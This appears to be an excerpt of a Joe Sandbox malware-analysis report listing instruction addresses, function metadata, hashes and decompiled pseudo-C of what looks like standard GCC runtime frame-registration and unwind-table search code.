0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013d7eb2
0x013d7eb2
0x013d7eb7
0x013d7eb7
0x013d7ebb
0x013d7ebd
0x013d7ec1
0x013d7ec8
0x013d7ecf
0x013d80b0
0x013d80b3
0x013d80b9
0x013d80bd
0x013d80bf
0x013d80c2
0x013d80c9
0x013d80cb
0x013d80cf
0x013d80cf
0x013d7ed5
0x013d7ed5
0x013d7ed7
0x013d7ed7
0x013d7ee0
0x013d7ee0
0x013d7ee3
0x013d7ee8
0x013d7eeb
0x013d7eed
0x013d7ef0
0x013d7ef2
0x013d7ef2
0x013d7ef6
0x013d7ef9
0x013d80e0
0x013d80e4
0x013d80e6
0x013d80e9
0x013d80eb
0x013d80f0
0x013d80f5
0x013d80f9
0x013d7eff
0x013d7eff
0x013d7eff
0x013d7eff
0x013d7ef9
0x013d7f08
0x013d7f0c
0x013d7f0e
0x013d7f10
0x013d7f14
0x013d7f18
0x013d7f1d
0x013d7f22
0x013d7f22
0x013d7f24
0x013d7f24
0x013d7f27
0x013d7f28
0x013d7f29
0x013d7f2b
0x013d7f2b
0x013d7eac
0x013d7ea4
0x013d7e9c
0x013d7e96
0x013d7e56
0x013d7e56
0x00000000
0x013d7e56
0x013d7e54
0x00000000
0x00000000
0x013d7e2b
0x013d7e60
0x013d7e62
0x013d811d
0x013d811d
0x013d8120
0x013d8125
0x013d8126
0x013d8127
0x013d8129
0x00000000
0x00000000
0x00000000
0x013d7e62
0x013d7e13
0x013d7e0b
0x013d7d52
0x013d7d00
0x00000000

APIs

strlen.MSVCRT ref: 013D7D2D

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 75fd3dfa97e41f374d09f2dfc934f3d370628dd45009a077de91b71e66904f3c
Instruction ID: ee540323ed6a8e8d4690a4aa5ab74dffdce59b2a9c3c5c59d27edfba5134b014
Opcode Fuzzy Hash: 75fd3dfa97e41f374d09f2dfc934f3d370628dd45009a077de91b71e66904f3c
Instruction Fuzzy Hash: 790216B29087519FD721CF2CD0443A5FFE2AF4531CF0986AED9A857392C376A909CB41

Uniqueness

Uniqueness Score: -1.00%

Function 013DC030 Relevance: 20.9, APIs: 7, Strings: 4, Instructions: 1617stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 013DC03A
strlen.MSVCRT ref: 013DC044

Strings

!, xrefs: 013DDBFE
inity, xrefs: 013DD9AF
5, xrefs: 013DC522
, xrefs: 013DD37D

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 52b876a0dd58b552f64a9ad858f985c44cc9f95e6e280b12b8afb4fd36623ad5
Instruction ID: 119e58ea592754645303e34ff64825019b6446990c8b5cc74e90136f4eaa1c48
Opcode Fuzzy Hash: 52b876a0dd58b552f64a9ad858f985c44cc9f95e6e280b12b8afb4fd36623ad5
Instruction Fuzzy Hash: 7CF244B2A18385CFD720DF68D08476ABBE1FF89358F45891DE98987391D771E844CB82

Uniqueness

Uniqueness Score: -1.00%

Function 01451810 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

random_device::random_device(const std::string&): device not available, xrefs: 014518D8
rdseed, xrefs: 01451858
default, xrefs: 0145182F
Genu, xrefs: 0145191F
Auth, xrefs: 01451927
Auth, xrefs: 014519B6
rand_s, xrefs: 014519F7
Genu, xrefs: 01451897
hardware, xrefs: 014519E0
Genu, xrefs: 014519AE
rdrand, xrefs: 014518E8
Auth, xrefs: 0145188F
random_device::random_device(const std::string&): unsupported token, xrefs: 01451A12
rdrnd, xrefs: 01451958

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: eb95d905e2a7ee2ceb20019d25c9729c847013dc40d7fa2131c34edf59500c57
Instruction ID: 9a23a37136c5de3d24b371993dc505a533b698df0e0e4607638407052abe0162
Opcode Fuzzy Hash: eb95d905e2a7ee2ceb20019d25c9729c847013dc40d7fa2131c34edf59500c57
Instruction Fuzzy Hash: 6041F5F26083424BE764BA3DC48032BBAA6BB51258F50493FDD81D73B2E739D951C352

Uniqueness

Uniqueness Score: -1.00%

Function 013D9E00 Relevance: 12.5, APIs: 8, Instructions: 490
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E013D9E00(signed int __eax, signed int __edx) {
				void* _v16;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed char _v45;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int* _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				char* _v132;
				signed char _t287;
				signed int _t289;
				signed char _t292;
				signed char _t297;
				void* _t301;
				char _t305;
				struct HINSTANCE__* _t309;
				_Unknown_base(*)()* _t310;
				struct HINSTANCE__* _t313;
				_Unknown_base(*)()* _t314;
				unsigned short _t317;
				signed int _t320;
				signed int _t321;
				void* _t327;
				intOrPtr _t331;
				signed int _t333;
				unsigned short _t334;
				signed int _t335;
				signed int _t336;
				signed int _t339;
				void* _t343;
				signed int _t347;
				signed int _t349;
				signed int _t350;
				signed int _t353;
				void* _t356;
				signed int _t360;
				void* _t365;
				signed int _t371;
				signed int _t376;
				signed int _t378;
				signed int _t379;
				signed int _t392;
				signed int _t395;
				signed int _t398;
				signed int _t402;
				signed int _t408;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				void* _t424;
				CHAR* _t425;
				signed int _t426;
				struct HINSTANCE__* _t427;
				signed int _t429;
				intOrPtr* _t431;
				signed int _t432;
				signed int _t433;
				void* _t434;
				void* _t436;
				intOrPtr _t441;
				signed int _t443;
				intOrPtr _t459;
				signed int _t461;
				intOrPtr _t463;
				signed int _t466;
				unsigned int _t468;
				intOrPtr _t469;
				intOrPtr _t472;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t480;
				CHAR* _t481;
				char _t482;
				signed int _t494;
				signed int _t497;
				intOrPtr* _t500;
				signed int _t501;
				signed int _t502;
				signed int _t505;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				intOrPtr* _t523;
				signed int _t524;
				signed int _t525;
				signed int _t528;
				CHAR* _t530;
				signed int _t531;
				_Unknown_base(*)()* _t533;
				intOrPtr _t534;
				signed int _t537;
				intOrPtr* _t539;
				signed int _t540;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				void* _t547;
				signed int _t549;
				signed int _t550;
				signed int _t551;
				intOrPtr _t552;
				void* _t553;
				signed int* _t554;
				char** _t556;
				char** _t557;
				struct HINSTANCE__** _t559;
				struct HINSTANCE__** _t560;
				signed int* _t561;

				_t554 = _t553 - 0x4c;
				_v72 = __eax;
				_t287 =  *(__eax + 0x10) & 0x000000ff;
				_v68 = __edx;
				if((_t287 & 0x00000001) == 0) {
					_t515 = _v72;
					_t468 =  *(_t515 + 0x10);
					_v76 = _t468;
					_t528 = _t468 >> 0xb;
					__eflags = _t528;
					_v52 = _t528;
					if(_t528 != 0) {
						L103:
						_t425 = 8 + _v52 * 4;
						 *_t554 = _t425;
						_t289 = malloc(??);
						_v36 = _t289;
						_t516 = _t289;
						__eflags = _t289;
						if(_t289 == 0) {
							goto L75;
						} else {
							 *((intOrPtr*)(_t289 + 4)) = 0;
							 *_t554 = _t425;
							_t378 = malloc(??);
							_v32 = _t378;
							_t531 = _t378;
							__eflags = _t378;
							if(_t378 != 0) {
								 *((intOrPtr*)(_t378 + 4)) = 0;
							}
							_t379 = _v72;
							_t545 =  *(_t379 + 0x10) & 0x000000ff;
							_t425 =  *(_t379 + 0xc);
							__eflags = _t545 & 0x00000002;
							if((_t545 & 0x00000002) == 0) {
								E013D9890(_v72, _t425,  &_v36);
								_v56 =  *((intOrPtr*)(_t516 + 4));
								goto L111;
							} else {
								_t465 =  *_t425;
								__eflags =  *_t425;
								if( *_t425 == 0) {
									goto L161;
								} else {
									_v76 = _t516;
									_v64 = _t531;
									_t543 = _t379;
									do {
										_t425 =  &(_t425[4]);
										E013D9890(_t543, _t465,  &_v36);
										_t465 =  *_t425;
										__eflags =  *_t425;
									} while ( *_t425 != 0);
									_t517 = _v76;
									_t531 = _v64;
									_v56 =  *(_t517 + 4);
									L111:
									__eflags = _v52 - _v56;
									if(_v52 != _v56) {
										goto L161;
									} else {
										_t545 = _t545 & 0x00000004;
										__eflags = _t545;
										if(_t545 == 0) {
											__eflags =  *(_v72 + 0x10) & 0x000007f8;
											_t386 =  !=  ? E013D9710 : E013D8EE0;
											_v76 =  !=  ? E013D9710 : E013D8EE0;
											__eflags = _t531;
											if(_t531 != 0) {
												goto L114;
											} else {
												goto L151;
											}
										} else {
											_v76 = E013D97B0;
											__eflags = _t531;
											if(_t531 == 0) {
												L151:
												E013D8FC0(_v72, _t516, _v76);
												goto L146;
											} else {
												L114:
												_t500 = _t516 + 8;
												__eflags = 0;
												_t550 = _v72;
												_v48 = _t516;
												_v64 = _t500;
												_t523 = _t500;
												_t431 = 0x14f20c4;
												_t501 = 0;
												do {
													__eflags = _t431 - 0x14f20c4;
													if(_t431 == 0x14f20c4) {
														L129:
														_t431 = 0x14f20c4;
													} else {
														_v60 = _t501;
														_t524 = _t531;
														_t539 = _t523;
														while(1) {
															_v84 =  *_t431;
															 *_t554 = _t550;
															_v88 =  *_t539;
															_t392 =  *_v76();
															__eflags = _t392;
															if(_t392 >= 0) {
																break;
															}
															_t395 = _t431 - _v64 >> 2;
															_t431 =  *((intOrPtr*)(_t524 + 8 + _t395 * 4));
															 *((intOrPtr*)(_t524 + 8 + _t395 * 4)) = 0;
															__eflags = _t431 - 0x14f20c4;
															if(_t431 == 0x14f20c4) {
																_t501 = _v60;
																_t531 = _t524;
																_t523 = _t539;
																goto L129;
															} else {
																continue;
															}
															goto L120;
														}
														_t501 = _v60;
														_t531 = _t524;
														_t523 = _t539;
													}
													L120:
													 *((intOrPtr*)(_t531 + 8 + _t501 * 4)) = _t431;
													_t501 = _t501 + 1;
													_t431 = _t523;
													_t523 = _t523 + 4;
													__eflags = _t501 - _v56;
												} while (_t501 != _v56);
												_t517 = _v48;
												_t545 = _v56;
												_t425 = 0;
												_t502 = 0;
												_t398 = 0;
												do {
													__eflags =  *(_t531 + 8 + _t398 * 4);
													_t459 =  *((intOrPtr*)(_t517 + 8 + _t398 * 4));
													if( *(_t531 + 8 + _t398 * 4) != 0) {
														 *((intOrPtr*)(_t517 + 8 + _t502 * 4)) = _t459;
														_t502 = _t502 + 1;
														__eflags = _t502;
													} else {
														 *((intOrPtr*)(_t531 + 8 + _t425 * 4)) = _t459;
														_t425 =  &(_t425[1]);
													}
													_t398 = _t398 + 1;
													__eflags = _t398 - _t545;
												} while (_t398 != _t545);
												 *(_t517 + 4) = _t502;
												 *(_t531 + 4) = _t425;
												__eflags = _v52 -  &(_t425[_t502]);
												if(_v52 !=  &(_t425[_t502])) {
													goto L161;
												} else {
													E013D8FC0(_v72, _t531, _v76);
													_t461 =  *(_t531 + 4);
													__eflags = _t461;
													if(_t461 != 0) {
														_v56 = _t531;
														_t402 = _t461;
														_t551 =  *(_t517 + 4);
														do {
															_t425 = _t402;
															_t402 = _t402 - 1;
															_t463 =  *((intOrPtr*)(_v56 + 8 + _t402 * 4));
															__eflags = _t551;
															if(_t551 == 0) {
																L148:
																_t540 = _t402;
																_t551 = 0;
															} else {
																_t238 = _t425 - 1; // -1
																_v60 = _t402;
																_t432 = _t551;
																_t552 = _t463;
																_t542 = _t517;
																_t525 = _t551 + _t238;
																while(1) {
																	_v64 = _t432;
																	_t425 = _t432 - 1;
																	_v84 = _t552;
																	_v88 =  *((intOrPtr*)(_t542 + 8 + _t425 * 4));
																	 *_t554 = _v72;
																	_t408 =  *_v76();
																	__eflags = _t408;
																	if(_t408 <= 0) {
																		break;
																	}
																	 *((intOrPtr*)(_t542 + 8 + _t525 * 4)) =  *((intOrPtr*)(_t542 + 8 + _t425 * 4));
																	_t525 = _t525 - 1;
																	__eflags = _t425;
																	if(_t425 == 0) {
																		_t402 = _v60;
																		_t517 = _t542;
																		_t463 = _t552;
																		goto L148;
																	} else {
																		continue;
																	}
																	goto L143;
																}
																_t463 = _t552;
																_t402 = _v60;
																_t551 = _v64;
																_t517 = _t542;
																_t540 = _t525;
															}
															L143:
															 *((intOrPtr*)(_t517 + 8 + _t540 * 4)) = _t463;
															__eflags = _t402;
														} while (_t402 != 0);
														_t531 = _v56;
														_t261 = _t517 + 4;
														 *_t261 =  *(_t517 + 4) +  *(_t531 + 4);
														__eflags =  *_t261;
													}
													 *_t554 = _t531;
													free(??);
													L146:
													_t505 = _v72;
													 *(_t505 + 0x10) =  *(_t505 + 0x10) | 0x00000001;
													 *(_t505 + 0xc) = _t517;
													 *_t517 =  *(_t505 + 0xc);
													goto L75;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t425 =  *(_t515 + 0xc);
						__eflags = _t287 & 0x00000002;
						if((_t287 & 0x00000002) == 0) {
							_t416 = E013D9520(_v72, _t425);
							_v52 = _t416;
							__eflags = _t416 - 0xffffffff;
							if(_t416 == 0xffffffff) {
								goto L74;
							} else {
								goto L101;
							}
						} else {
							_t514 =  *_t425;
							__eflags =  *_t425;
							if( *_t425 != 0) {
								while(1) {
									_t424 = E013D9520(_t515, _t514);
									__eflags = _t424 - 0xffffffff;
									if(_t424 == 0xffffffff) {
										break;
									}
									_t514 = _t425[4];
									_t425 =  &(_t425[4]);
									_t528 = _t528 + _t424;
									__eflags = _t514;
									if(_t514 == 0) {
										_v52 = _t528;
										L101:
										_t544 = _v72;
										_t466 = _v52;
										_t418 =  *(_t544 + 0x10);
										_v76 = _t418;
										_t420 = _t418 & 0x000007ff | _t466 << 0x0000000b;
										 *(_t544 + 0x10) = _t420;
										__eflags = _t466 - 0x1fffff;
										if(_t466 <= 0x1fffff) {
											__eflags = _v52;
											if(_v52 == 0) {
												goto L75;
											} else {
												goto L103;
											}
										} else {
											_t422 = _t420 & 0x000007ff;
											__eflags = _t422;
											 *(_t544 + 0x10) = _t422;
											goto L103;
										}
									} else {
										continue;
									}
									goto L166;
								}
								L74:
								_t417 = _v72;
								 *((intOrPtr*)(_t417 + 0x10)) = 0x7f8;
								 *((intOrPtr*)(_t417 + 0xc)) = 0x14ac8b0;
								goto L75;
							} else {
								L75:
								__eflags = _v68 -  *_v72;
								if(_v68 <  *_v72) {
									goto L66;
								} else {
									_t517 = _v72;
									_t292 =  *(_t517 + 0x10) & 0x000000ff;
									_t530 =  *(_t517 + 0xc);
									__eflags = _t292 & 0x00000001;
									if((_t292 & 0x00000001) != 0) {
										goto L52;
									} else {
										__eflags = _t292 & 0x00000002;
										if((_t292 & 0x00000002) == 0) {
											_t443 = _v68;
											_t333 = _v72;
											_t561 =  &(_t554[0x13]);
											_t481 = _t530;
											_pop(_t428);
											_pop(_t531);
											_pop(_t517);
											_pop(_t548);
											_push(_t517);
											_push(_t531);
											_t425 = _t481;
											_t554 = _t561 - 0x4c;
											_v64 = _t333;
											_t334 =  *(_t333 + 0x10) & 0x0000ffff;
											_v52 = _t443;
											_v60 = _t334;
											_t335 = _t334 >> 3;
											__eflags = _t335 - 0xff;
											if(_t335 == 0xff) {
												_v56 = 0;
												_t549 = 0xff;
												goto L12;
											} else {
												_t549 = _t335 & 0x000000ff;
												_t371 = _t335 & 0x00000070;
												__eflags = _t371 - 0x20;
												if(__eflags == 0) {
													_v56 =  *((intOrPtr*)(_v64 + 4));
													goto L12;
												} else {
													if(__eflags <= 0) {
														L41:
														_v56 = 0;
														goto L12;
													} else {
														__eflags = _t371 - 0x30;
														if(_t371 != 0x30) {
															__eflags = _t371 - 0x50;
															if(_t371 != 0x50) {
																goto L160;
															} else {
																goto L41;
															}
														} else {
															_v56 =  *((intOrPtr*)(_v64 + 8));
															L12:
															_t531 =  *_t425;
															_v60 = 0;
															__eflags = _t531;
															if(_t531 != 0) {
																do {
																	_t336 = _t425[4];
																	__eflags = _t336;
																	if(_t336 == 0) {
																		goto L23;
																	} else {
																		_t517 = _v64;
																		__eflags =  *(_t517 + 0x10) & 0x00000004;
																		if(( *(_t517 + 0x10) & 0x00000004) != 0) {
																			_t18 =  &(_t425[4]); // 0x5
																			_t517 = _t18 - _t336;
																			__eflags = _t517 - _v60;
																			if(_t517 == _v60) {
																				goto L26;
																			} else {
																				_t353 = E013D91E0(_t517);
																				_v45 = _t353;
																				_t549 = _t353;
																				__eflags = _t353 - 0xff;
																				if(_t353 == 0xff) {
																					_t60 =  &(_t425[8]); // 0x9
																					 *_t554 =  &_v36;
																					_t356 = E013D9050(0xff, _t60, 0);
																					 *_t554 =  &_v32;
																					E013D9050(_t549 & 0x0000000f, _t356, 0);
																					_v60 = _t517;
																					_v56 = 0;
																					goto L23;
																				} else {
																					_t360 = _t353 & 0x00000070;
																					__eflags = _t360 - 0x20;
																					if(__eflags == 0) {
																						_v60 = _t517;
																						_v56 =  *((intOrPtr*)(_v64 + 4));
																						__eflags = _t549;
																						if(_t549 == 0) {
																							goto L21;
																						} else {
																							goto L45;
																						}
																					} else {
																						if(__eflags <= 0) {
																							L36:
																							_v60 = _t517;
																							_v56 = 0;
																							__eflags = _t549;
																							if(_t549 == 0) {
																								goto L21;
																							} else {
																								goto L27;
																							}
																						} else {
																							__eflags = _t360 - 0x30;
																							if(_t360 != 0x30) {
																								__eflags = _t360 - 0x50;
																								if(_t360 != 0x50) {
																									goto L160;
																								} else {
																									goto L36;
																								}
																							} else {
																								_v60 = _t517;
																								_v56 =  *((intOrPtr*)(_v64 + 8));
																								__eflags = _t549;
																								if(_t549 != 0) {
																									L45:
																									_t56 =  &(_t425[8]); // 0x9
																									 *_t554 =  &_v36;
																									_t365 = E013D9050(_t549 & 0x000000ff, _t56, _v56);
																									 *_t554 =  &_v32;
																									E013D9050(_t549 & 0x0000000f, _t365, 0);
																									goto L28;
																								} else {
																									goto L21;
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			L26:
																			__eflags = _t549;
																			if(_t549 == 0) {
																				L21:
																				_t339 = _t425[8];
																				_t482 = _t425[0xc];
																				_t549 = 0;
																				_v36 = _t339;
																				_v32 = _t482;
																				__eflags = _t339;
																				if(_t339 == 0) {
																					goto L23;
																				} else {
																					__eflags = _v52 - _t339 - _t482;
																					if(_v52 - _t339 < _t482) {
																						goto L34;
																					} else {
																						goto L23;
																					}
																				}
																			} else {
																				L27:
																				_t38 =  &(_t425[8]); // 0x9
																				 *_t554 =  &_v36;
																				_t343 = E013D9050(_t549 & 0x000000ff, _t38, _v56);
																				 *_t554 =  &_v32;
																				E013D9050(_t549 & 0x0000000f, _t343, 0);
																				_t347 = _t549;
																				_v45 = _t347;
																				__eflags = _t347 - 0xff;
																				if(_t347 == 0xff) {
																					goto L23;
																				} else {
																					L28:
																					_t349 = _v45 & 7;
																					__eflags = _t349 - 2;
																					if(__eflags == 0) {
																						_t494 = 0xffff;
																						goto L32;
																					} else {
																						if(__eflags > 0) {
																							__eflags = _t349 - 3 - 1;
																							if(_t349 - 3 <= 1) {
																								goto L31;
																							} else {
																								goto L160;
																							}
																						} else {
																							__eflags = _t349;
																							if(_t349 != 0) {
																								L160:
																								abort();
																								goto L161;
																							} else {
																								L31:
																								_t494 = 0xffffffff;
																								L32:
																								_t350 = _v36;
																								__eflags = _t350 & _t494;
																								if((_t350 & _t494) == 0) {
																									goto L23;
																								} else {
																									__eflags = _v52 - _t350 - _v32;
																									if(_v52 - _t350 >= _v32) {
																										goto L23;
																									} else {
																										L34:
																										return _t425;
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L166;
																	L23:
																	_t425 =  &(_t425[_t531 + 4]);
																	_t531 =  *_t425;
																	__eflags = _t531;
																} while (_t531 != 0);
																goto L43;
															} else {
																L43:
																__eflags = 0;
																return 0;
															}
														}
													}
												}
											}
										} else {
											__eflags =  *_t530;
											if( *_t530 == 0) {
												goto L66;
											} else {
												_t429 = _v72;
												while(1) {
													_t376 = _t429;
													L7();
													__eflags = _t376;
													if(_t376 != 0) {
														break;
													}
													_t497 = _t530[4];
													_t530 =  &(_t530[4]);
													__eflags = _t497;
													if(_t497 == 0) {
														goto L66;
													} else {
														continue;
													}
													goto L166;
												}
												return _t376;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L52:
					_t531 = _v72;
					_t433 =  *((intOrPtr*)(_t531 + 0xc));
					_v76 = _t433;
					__eflags = _t292 & 0x00000004;
					if((_t292 & 0x00000004) != 0) {
						_t545 =  *(_t433 + 4);
						__eflags = _t545;
						if(_t545 != 0) {
							_v64 = 0;
							do {
								_t531 = _t545 + _v64 >> 1;
								_t517 =  *(_v76 + 8 + _t531 * 4);
								_t297 = E013D91E0(_t517 + 4 -  *(_t517 + 4));
								_t434 = _t517 + 8;
								_t425 = _t297;
								_v60 = _t297 & 0x000000ff;
								__eflags = _t425 - 0xff;
								if(_t425 == 0xff) {
									L127:
									_t469 = 0;
									goto L98;
								} else {
									_t474 = _t425 & 0x00000070;
									__eflags = _t474 - 0x20;
									if(__eflags == 0) {
										_t469 =  *((intOrPtr*)(_v72 + 4));
										goto L98;
									} else {
										if(__eflags <= 0) {
											goto L127;
										} else {
											__eflags = _t474 - 0x30;
											if(_t474 != 0x30) {
												__eflags = _t474 - 0x50;
												if(_t474 != 0x50) {
													goto L161;
												} else {
													goto L127;
												}
											} else {
												_t469 =  *((intOrPtr*)(_v72 + 8));
												L98:
												 *_t554 =  &_v40;
												_t301 = E013D9050(_t425 & 0x000000ff, _t434, _t469);
												 *_t554 =  &_v36;
												E013D9050(_t425 & 0x0000000f, _t301, 0);
												_t305 = _v40;
												_t472 = _v68;
												__eflags = _t472 - _t305;
												if(_t472 >= _t305) {
													__eflags = _t472 - _t305 + _v36;
													if(_t472 < _t305 + _v36) {
														_t426 = _t517;
														goto L67;
													} else {
														_v64 = _t531 + 1;
														goto L92;
													}
												} else {
													_t545 = _t531;
													goto L92;
												}
											}
										}
									}
								}
								goto L166;
								L92:
								__eflags = _v64 - _t545;
							} while (_v64 < _t545);
						}
						goto L66;
					} else {
						_t317 =  *(_v72 + 0x10) & 0x0000ffff;
						__eflags = _t317 & 0x000007f8;
						if((_t317 & 0x000007f8) == 0) {
							_t436 = 0;
							_t475 =  *(_v76 + 4);
							while(1) {
								__eflags = _t436 - _t475;
								if(_t436 >= _t475) {
									break;
								}
								_t320 = _t475 + _t436 >> 1;
								_t426 =  *(_v76 + 8 + _t320 * 4);
								_t534 =  *((intOrPtr*)(_t426 + 8));
								__eflags = _v68 - _t534;
								if(_v68 >= _t534) {
									__eflags = _v68 - _t534 +  *((intOrPtr*)(_t426 + 0xc));
									if(_v68 >= _t534 +  *((intOrPtr*)(_t426 + 0xc))) {
										_t436 = _t320 + 1;
										continue;
									}
								} else {
									_t475 = _t320;
									continue;
								}
								goto L67;
							}
							goto L66;
						} else {
							_t321 = _t317 >> 3;
							_v64 = _t321 & 0x000000ff;
							__eflags = _t321 - 0xff;
							if(_t321 == 0xff) {
								L132:
								_t476 = 0;
								goto L59;
							} else {
								_t480 = _t321 & 0x00000070;
								__eflags = _t480 - 0x20;
								if(__eflags == 0) {
									_t476 =  *((intOrPtr*)(_v72 + 4));
									goto L59;
								} else {
									if(__eflags <= 0) {
										goto L132;
									} else {
										__eflags = _t480 - 0x30;
										if(_t480 != 0x30) {
											__eflags = _t480 - 0x50;
											if(_t480 != 0x50) {
												L161:
												abort();
												abort();
												abort();
												abort();
												abort();
												_push(_t545);
												_push(_t517);
												_push(_t531);
												_t556 = _t554 - 0x1c;
												 *_t556 = "libgcc_s_dw2-1.dll";
												_t309 = GetModuleHandleA(_t425);
												_t557 = _t556 - 4;
												if(_t309 == 0) {
													_t310 = 0x13dae40;
													_t533 = E013DA660;
												} else {
													_t427 = _t309;
													 *_t557 = "libgcc_s_dw2-1.dll";
													_t313 = LoadLibraryA(??);
													_t559 = _t557 - 4;
													 *0x14f2020 = _t313;
													_v132 = "__register_frame_info";
													 *_t559 = _t427;
													_t314 = GetProcAddress(??, ??);
													_t560 = _t559 - 8;
													_t533 = _t314;
													_v132 = "__deregister_frame_info";
													 *_t560 = _t427;
													_t310 = GetProcAddress(??, ??);
													_t557 = _t560 - 8;
												}
												 *0x1481004 = _t310;
												if(_t533 != 0) {
													_v132 = 0x14f2024;
													 *_t557 = 0x14b3104;
													 *_t533();
												}
												 *_t557 = E013C1560;
												return E013C14A0();
											} else {
												goto L132;
											}
										} else {
											_t476 =  *((intOrPtr*)(_v72 + 8));
											L59:
											_t520 =  *(_v76 + 4);
											__eflags = _t520;
											if(_t520 == 0) {
												L66:
												_t426 = 0;
												__eflags = 0;
											} else {
												_v56 = _t476;
												_t547 = 0;
												_v72 = _t321 & 0x0000000f;
												_v60 =  &_v36;
												while(1) {
													L63:
													_t537 = _t520 + _t547 >> 1;
													_t426 =  *(_v76 + 8 + _t537 * 4);
													 *_t554 =  &_v40;
													_t327 = E013D9050(_v64, _t426 + 8, _v56);
													 *_t554 = _v60;
													E013D9050(_v72, _t327, 0);
													_t331 = _v40;
													_t441 = _v68;
													__eflags = _t441 - _t331;
													if(_t441 < _t331) {
														break;
													}
													__eflags = _t441 - _t331 + _v36;
													if(_t441 >= _t331 + _v36) {
														_t547 = _t537 + 1;
														__eflags = _t547 - _t520;
														if(_t547 >= _t520) {
															goto L66;
														} else {
															continue;
														}
													}
													goto L67;
												}
												_t520 = _t537;
												__eflags = _t547 - _t520;
												if(_t547 < _t520) {
													goto L63;
												} else {
													goto L66;
												}
											}
											L67:
											return _t426;
										}
									}
								}
							}
						}
					}
				}
				L166:
			}

0x013d9e04
0x013d9e07
0x013d9e0b
0x013d9e0f
0x013d9e15
0x013d9f18
0x013d9f1c
0x013d9f21
0x013d9f25
0x013d9f25
0x013d9f28
0x013d9f2c
0x013da12d
0x013da131
0x013da138
0x013da13b
0x013da140
0x013da144
0x013da146
0x013da148
0x00000000
0x013da14e
0x013da14e
0x013da155
0x013da158
0x013da15d
0x013da161
0x013da163
0x013da165
0x013da167
0x013da167
0x013da16e
0x013da172
0x013da176
0x013da179
0x013da17f
0x013da47f
0x013da487
0x00000000
0x013da185
0x013da185
0x013da187
